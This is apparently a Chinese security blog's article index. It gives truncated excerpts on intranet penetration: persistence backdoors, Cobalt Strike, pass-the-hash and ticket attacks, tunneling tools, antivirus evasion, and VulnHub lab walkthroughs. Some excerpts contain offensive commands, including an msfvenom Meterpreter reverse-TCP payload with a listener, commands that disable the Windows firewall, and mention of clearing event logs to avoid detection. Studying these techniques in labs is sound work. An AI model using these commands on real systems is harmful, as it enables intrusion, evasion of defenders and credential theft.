战神/calmness
做最好的自己
展开
-
内网-powershell 基础
powershell 基础目录powershell 基础Powershell的特点:Powershell的基本概念Powershell 的常用命令(1) 绕过本地权限并执行(2) 从网站服务器中下载脚本,绕过本地权限并隐藏执行(3)使用Base64 对powershell 命令进行编码powershell 是一种命令行外壳程序和脚本环境,它内置在每个受支持的...原创 2020-04-29 21:03:48 · 439 阅读 · 0 评论 -
内网权限维持 —— 后门
目录操作系统后门粘滞键注册表注入计划任务meterpreterCymothoaWMI型web 后门Nishang 下的webshellweevelywebacooASPX meterpreterPHP meterpreter域控制器权限持久化DSRM 域后门SSP 维持域控权限SID History 域后门Golden TicketSilver TicketSkeleton KeyHook PasswordChangeNot原创 2020-12-09 15:47:32 · 1044 阅读 · 0 评论 -
Aggressor脚本的编写
目录Aggressor 脚本语言变量数组哈希表注释比较运算符条件判断循环函数定义弹出式菜单定义 alias 关键字注册Beacon命令bpowershell_import函数加载Aggressor脚本介绍:Aggressor-Script语言就是帮助Cobalt Strike 扩展功能的首选工具在Sleep语言的基础上,开发了Aggressor-Script语言,用于扩展Cobalt Strike的功能Aggressor 脚本语言变原创 2020-05-19 15:08:01 · 459 阅读 · 1 评论 -
一次简单的内网域渗透过程
目录准备环境端口扫描永恒之蓝MIMIKATZRDP 登录查看IP信息查看有几个域共享目录查看保存登录凭证查看登录域查看所有计算机名称查找目录中的用户环境变量查看域控查看域里面的组查看域管查看网段里的存活主机准备环境虚拟机:Winserver2008 r2 : 192.168.211.18Kali : 192.168.210.249端口扫描永恒之蓝发现445端口开放尝试使用永恒之蓝漏洞进行攻击...原创 2020-07-24 21:11:38 · 349 阅读 · 0 评论 -
网络层隧道
目录网络层隧道icmp描述环境过程•Icmpsh•Icmptunnel•Pingtunnel安装:测试:网络层隧道icmp描述 隧道搭建 入侵过程中攻击方会通过以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用类似蚯蚓独有的手段突破网络限制,给防火墙松土。在很多复杂的网络环境中,攻击者需要将自己的攻击流量带入到目标所处的网络进行下一步的横向拓展时,会使用各类的隧道搭建工具建立流量传输隧道。 说的...原创 2020-11-06 11:01:45 · 192 阅读 · 2 评论 -
内网-信息收集2
信息收集目录定位域管理员域管理员定位概述常用域管理员定位工具查找域管理进程本机检查查询域控制器的域用户会话查询远程系统中运行的任务扫描远程系统的NetBIOS信息域管理员模拟方法简介利用Powershell 收集域信息域分析工具 BloodHound配置环境采集数据导入数据查询信息敏感数据的防护资料、数据、文件的定位流程...原创 2020-11-26 16:02:50 · 107 阅读 · 0 评论 -
内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK(传递密钥)
目录PTH(pass-the-hash)Mimikatzwmiexec第一种:第二种:CrackMapExecPTT(pass the ticket)ms14-068Golden ticket (黄金票据)silver ticket (白银票据)PTK (pass the key)PTH(pass-the-hash)描述pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM .原创 2020-10-01 22:09:50 · 857 阅读 · 0 评论 -
内网渗透——windows认证
目录windows密码HashNTLM hashNET-NTLM hashNTLM 认证域环境中Kerberos协议1.用户登陆2.请求身份认证3. 请求服务授权客户端向TGS发送请求服务授权请求TGS为Client响应服务授权票据4.发送服务请求Client向Service Server发送服务请求SS响应Client认证流程中需要关注的点,票据伪造的原理在域渗透中,横向移动最重要是对windows认证协议的理解windows密码H.原创 2020-10-01 22:23:11 · 225 阅读 · 0 评论 -
网络层IPV6隧道技术
常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输一般的网络通信,先在两台机器之间建立tcp连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备,软 硬件 防火墙甚至入侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。。隧道:就是...原创 2020-12-09 09:52:51 · 264 阅读 · 1 评论 -
虚拟机内网【域】环境搭建
准备: 都是NAT模式Windwos Server 2012R2为域控制器,IP地址为192.168.1.1 Windows Server 2008 R2为域内计算机,IP地址为192.168.1.2 Win2003为域内计算机,IP地址为192.168.1.3过程:win server 2012R2将 win server 2012R2 的计算机名改成 DC之后,下一步 就可以了创建AD用户 【活动目录】设置两个用户...原创 2020-07-16 12:31:23 · 795 阅读 · 0 评论 -
内网-域知识
域知识域中计算机分类域内权限解读原创 2020-04-22 20:14:01 · 631 阅读 · 0 评论 -
内网-安全域名划分
安全域名划分以上一个虚线框表示一个安全域【也就是网络边界,一般分为DMZ和内网】通过硬件防火墙的不同端口是实现隔离划分安全域的目的是将一组安全等级相同的计算机划入同一网段。这个网段内的计算机拥有相同的网络边界,并在网络边界上通过部署防火墙来实现对其他安全域的网络访问控制策略【NACL】 从而对允许哪些IP地址访问此域、允许此域访问哪些IP地址和网段进行设置。这些措施,将使得网络风险最小...原创 2020-04-22 20:17:01 · 1453 阅读 · 0 评论 -
内网 —— 跨域攻击
目录跨域攻击的方法利用域信任关系的跨域攻击 域信任关系 获取域信息 利用域信任密钥获取目标域的权限 利用krbtgt 散列值获取目标域的权限 外部信任和林信任 利用无约束委派 和 MS-RPRN 获取信任林权限防范跨域攻击跨域攻击的方法都有自己的内网,一般通过域林进行共享资源。根据不同职能区分利用域信任关系的跨域攻击 域信任关系 获取域信息 利用域信任密钥获取目标域的权限...原创 2020-12-09 15:55:12 · 736 阅读 · 0 评论 -
内网渗透 IPC$ [空连接]
IPC$概念IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用;IPC$作用利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。IPC$利用条件139,445端口开启 ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用原创 2020-09-30 22:52:57 · 2543 阅读 · 0 评论 -
从零至壹上贰弃叁得肆之综合渗透贯穿始终
描述题目的意思是从0开始进行外网的渗透测试到达壹;之后进行内网漫游属于贰;应急响应是叁,应急响应中摒弃病毒、木马文件等,之后进行追踪溯源的操作,获取黑客信息属于肆;其次就是后期的运营方面的建设;进行从开始的环境搭建步步紧跟,资料的查询,不断地思考,提升内在解决问题的能力;从而构造安全建设的内外体系的形成;思路kali 首先攻击win7【CMS】-横向移动发现win10和win2008-攻击域控win2012-拿下域控权限-进行应急响应去处置-之后溯源-找到黑客信息进行封杀-后期进行安全运营建原创 2021-01-03 23:03:43 · 600 阅读 · 1 评论 -
FourEye 免杀
生成木马root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=444 -f raw -o shellcode.rawmsf5 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf5 exploit(multi/handler) > se..原创 2020-12-25 19:58:29 · 736 阅读 · 0 评论 -
BOF题
描述过程使用MSF下的工具pattern_create生成3000个随机字符串root@kali:~# locate pattern_create/usr/share/metasploit-framework/tools/exploit/pattern_create.rb将生成的随机字符串放置到poc.py;注释原有的junk。在原基础上发送3000个随机字符串后,EIP地址已经不再是41414141了 ;...原创 2021-01-03 23:07:50 · 153 阅读 · 1 评论 -
reGeorg 的使用
目录描述环境过程linux 版本reGeorg+proxychains代理windows 版本reGeorg+proxifier代理注意描述reGeorgSocksProxy由服务端和客户端两部分组成。服务端有php、aspx、asph、jsp、node.js等多个版本,客户端则由python编写。其工作原理可简单描述为python客户端在本地监听一个端口,提供socks服务,并将数据通过http/https协议发送到服务端上,并从服务端上用socket实现转发。 ...原创 2020-11-16 15:29:47 · 1398 阅读 · 0 评论 -
内网中-压缩数据
压缩数据RAR7-Zip参考链接原创 2021-03-20 21:25:01 · 229 阅读 · 0 评论 -
EW 隧道
描述环境Windows 10 内网地址:192.168.1.14kali 公网地址:192.168.28.130过程正向转发./ew_for_linux64 -s lcx_tran -l 1080 -f 192.168.1.14 -g 3389反向端口转发一个不成功的例子:kali机器上【攻击机】监听:Windows机器上执行结果失败一个成功的例子:后面再写...原创 2020-11-14 19:19:05 · 317 阅读 · 0 评论 -
Ssocks 隧道
目录描述过程程序功能帮助环境模拟描述 sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试。 过程说明一下——攻击端和受害端都得安装ssocks,否则无法遥相呼应https://sourceforge.net/projects/ssocks/解压编译root@kali...原创 2020-11-12 13:07:07 · 712 阅读 · 0 评论 -
内网-信息收集1
内网信息收集目录内网信息收集收集本机信息查询网络配置信息查询操作系统及软件的信息查看系统体系结构查看安装的软件及版本、路径等查询本机服务信息查询进行列表查看启动程序信息查看计划任务查看主机开机时间查询用户列表查看当前在线用户列出或断开本地计算机与所连接的客户端之间的会话查询端口列表查看补丁列表查询本机共享列表查询路由表及所...原创 2020-06-07 20:40:47 · 163 阅读 · 0 评论 -
内网-最后一章 Cobalt Strike
Cobalt Strike 是一款商业软件,安装java 环境 部署 TeamServer 服务器启动其中连接密码就是teamserver 所设置的下面就是Cobalt Strike 主界面利用Cobalt Strike 获取第一个Beacon...原创 2020-12-11 22:30:18 · 199 阅读 · 0 评论 -
基础CobaltStrike上线Linux主机
准备环境1、(CrossC2)CrossC2-cs4.1\src\CrossC2.cnahttps://download.csdn.net/download/weixin_43650289/204472362、LINUX云服务器3、C2插件genCrossC2.Linux 上传至Cobaltstrike3.14目录下https://download.csdn.net/download/weixin_43650289/204471884、云服务器5、CobaltStrike3.原创 2021-07-24 12:46:08 · 571 阅读 · 1 评论 -
应用层DNS隧道
我们测试一下使用dns反弹shell,用于测试的域名:test.njcx.bid该域名的dns服务器位于 ns1.njcx.bid(公网ip:111.222.333.444)受控机Windows7 :172.16.42.134控制机 CentOS7:111.222.333.444我们用到的工具DNS-Shell,我们在 CentOS7 上面执行 python DNS-shell.py -l -r test.njcx.bid ,接收由受控机过来的shell,执行后会生成一个 power...原创 2020-11-19 19:15:58 · 176 阅读 · 0 评论 -
内网工作组和域知识
工作组和域知识你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切.内网也会指的是局域网,指在某一区域内由多台计算机互连而成的计算机组,组网范围通常在数千米以内 。在局域网中,可以实现文件管理,应用软件共享,打印机,邮件,传真,工作组的日程安排等内网是封闭的,可以由办公室内的两台计算机组成,也可以由一个公司内的大量计算机组成。工作组:定义:将不同的计算机按功能或者部门分别...原创 2020-04-18 09:03:38 · 473 阅读 · 0 评论 -
传输层Powercat.ps1隧道
目录描述过程用IEX下载远程PS1脚本回来权限绕过执行正向连接(WINDOWS连接KALI)WINDOWS之间互弹SHELL描述•PowerCat是Netcat的Powershell版本•由于PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。命令参数•-c 指定一个ip地址•-p 指定一个端口•-v 显示详情•-l 监听模式,用于入站链接•..原创 2020-11-19 19:34:18 · 184 阅读 · 0 评论 -
传输层LCX隧道
https://github.com/inquisb/icmpsh准备:kali 192.168.243.141win7 192.168.243.154icmp隧道搭建原创 2020-11-19 19:24:44 · 279 阅读 · 0 评论 -
内网-活动目录
活动目录【AD】目录定义 目录服务 逻辑结构 功能点 域控制器和活动目录的区别定义指的是域环境中提供目录服务的组件。如果将企业内网看成一本字典,那么内网里的资源就是字典的内容,活动目录就相当于字典的索引。也就是说,活动目录存储的是网络中所有资源的快捷方式,用户可以 通过寻找快捷方式来定位资源。目录服务指的是帮助用户快速、准确地从目录中找到其所需要的信息的服务活...原创 2020-04-22 20:15:54 · 143 阅读 · 0 评论 -
传输层Netsh隧道
前提条件nc下载https://eternallybored.org/misc/netcat/安装在C盘下/用户目录内或者设置环境变量基本命令netsh firewall show state 查看系统防火墙状态netsh firewall set opmode disable 关闭防火墙netsh firewall set opmode enable 开启防火墙netsh advfirewall show allprofiles 查看所有类型的防火墙状态ne原创 2020-11-18 23:16:49 · 138 阅读 · 0 评论 -
逃避日志记录攻击过程
简述windows事件日志简介:Windows 系统日志是记录系统中硬件、软件和系统问题的信息,同时还可以监视系统中发生的事件。用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹。禁用Windows事件日志记录,是最常规红队手法,为了减少可用于安全人员检测和审核的数据量,提高红队活动的隐蔽性,红队人员可以禁用Windows事件日志记录。在windows各种日志中,最常用被安全人员审计的日志,有应用程序日志,系统日志,安全日志。手法1.使用Wevtutil命令清除事件日志Wevt原创 2021-06-23 21:59:28 · 252 阅读 · 0 评论 -
RDP之远程登录
简述最近搞内网渗透测试,发现得经常的去连接远程桌面,故此写一下整理一下笔记,巩固一下知识rdp服务是我们常用的服务,可以不是3389端口,可以改成任意端口,时候为了利用它,必须先找出来服务端口,毕竟管理员也鸡贼。查看RDP服务端口查看rdp服务端口REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber得到连接端口为 0xd3d原创 2021-06-23 21:59:05 · 2063 阅读 · 0 评论 -
64Base_3mrgnc3 - linux
DownloadBack to the TopPlease remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our原创 2021-01-03 23:01:35 · 352 阅读 · 2 评论 -
Vulhub —— MERCY-v2 实战
目录目标环境过程信息收集nmap扫描访问8080端口页面目录遍历dirbgobustermanager页面扫描nikto枚举 用户enum4linux版本信息搜索tomcat 漏洞访问共享搜索漏洞rips 0.53文件包含配置信息tomcat7/tomcat-users.xml获得用户名和密码文件上传获取shell信息扫描LinEnum.sh扫描到的用户:linux-exploit-suggester.sh 收集原创 2020-12-24 07:15:45 · 1350 阅读 · 0 评论 -
symfonos: 1
目录NameDownload信息收集访问80端口查看robots.txt 无果目录遍历发现139、445的smb插件wordpress 漏洞进行文件包含mail-masta文件包含mali文件查看写入木马文件25端口nc 反弹拿shell交互pythonPATH变量提权proof.txtNameName: symfonos: 1 Date release: 29 Jun 2019 Author:Zayotic Series:...原创 2020-12-26 21:22:59 · 962 阅读 · 0 评论 -
pWnOS: 2.0 - linux
目录靶机地址信息收集Whatweb 查是否是CMS访问80页面IsIntS目录遍历PHP信息版本搜索漏洞利用hydra 爆破web登录页面尝试错误爆破:killerbeesareflying报错注入输入账户密码登录blog查看源码注入读取文件load_fileinto outfile 函数命令执行反弹shell [一]反弹shell [二]提权直接登录成功(二)查看blog源码MSF登录成功上传php-rev原创 2020-12-28 09:31:43 · 488 阅读 · 0 评论 -
Lazysysadmin - linux
目录信息收集访问80端口页面-backnode目录遍历wordpressWPscanenum4linux发现共享OKnikto扫描phpmyadmin查看共享目录找到wordpress密码 wp-config.php登录成功文件上传修改反弹木马(二) phpmyadminSSH登录sudo提权参考链接信息收集root@kali:~# nmap -A 192.168.243.159Starting Nmap 7.70 ( ht原创 2021-01-26 22:22:48 · 315 阅读 · 1 评论 -
6Days_Lab-v1.0.1 - linux
目录Download信息收集目录遍历文件包含调用了src函数账户密码配置文件passwd信息查看apache默认配置信息Python通过ssrf+sql注入获取当前数据库中的表获取表中字段名获取所需账号密码信息SSHperl反弹shell内核提权搜索exp参考链接DownloadBack to the TopPlease remember that VulnHub is a free community resource..原创 2021-01-22 19:23:10 · 369 阅读 · 0 评论 -
vulhub 学习下载
New Boxes (March 2020): DC 9: https://www.vulnhub.com/entry/dc-9,412/ Digitalworld.local (Bravery): https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Digitalworld.local (Development): https://www.vulnhub.com/entry/digitalworldlocal-develop原创 2020-12-24 13:51:38 · 786 阅读 · 0 评论 -
Vulhub —— Node
目录信息收集查看页面源码home.jslatest用户名密码tom 账户users 目录进行登录下载备份文件暴力破解压缩密码解压文件内核版本提权信息收集root@kali:~# nmap -Pn -A -p- 192.168.19.135Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-23 20:22 ESTNmap scan report for bogon (192.168.19...原创 2020-12-25 09:08:32 · 301 阅读 · 0 评论